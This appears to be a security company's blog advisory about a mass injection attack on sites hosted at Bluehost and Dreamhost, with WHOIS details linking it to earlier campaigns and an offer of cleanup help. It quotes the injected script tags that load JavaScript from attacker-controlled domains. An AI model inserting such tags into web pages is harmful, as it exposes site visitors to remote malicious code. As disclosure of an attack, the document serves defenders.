Update 1: It seems that this attack is limited to only Bluehost and Dreamhost, not GoDaddy like in the previous times.
Update 2: This script should fix/clean an infected site: site fix.php
Update 3: Attackers are using nowisisdudescars.com and onlineisdudescars.com as well.
<script src=" http://whereisdudescars.com/js2.php"></script>
<script src=" http://nowisisdudescars.com/js.php
What is interesting is the people behind this attack. Do you remember the losotrana attack amongst the various others we’ve discussed in the past few months? Well, the people involved in this one are the same. Check out the WHOIS contact info for whereisdudescars.com:
Domain name: whereisdudescars.com
Hilary Kneber firstname.lastname@example.org
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
It’s the same email@example.com that registered losotrana.com, holasionweb.com and others. We’re still researching the exploit vector, and we’ll post more details when we have them.
If you’re having difficulties getting your site cleaned up, send us an email to firstname.lastname@example.org or visit our site: sucuri.net. We can get your sites clean up right away.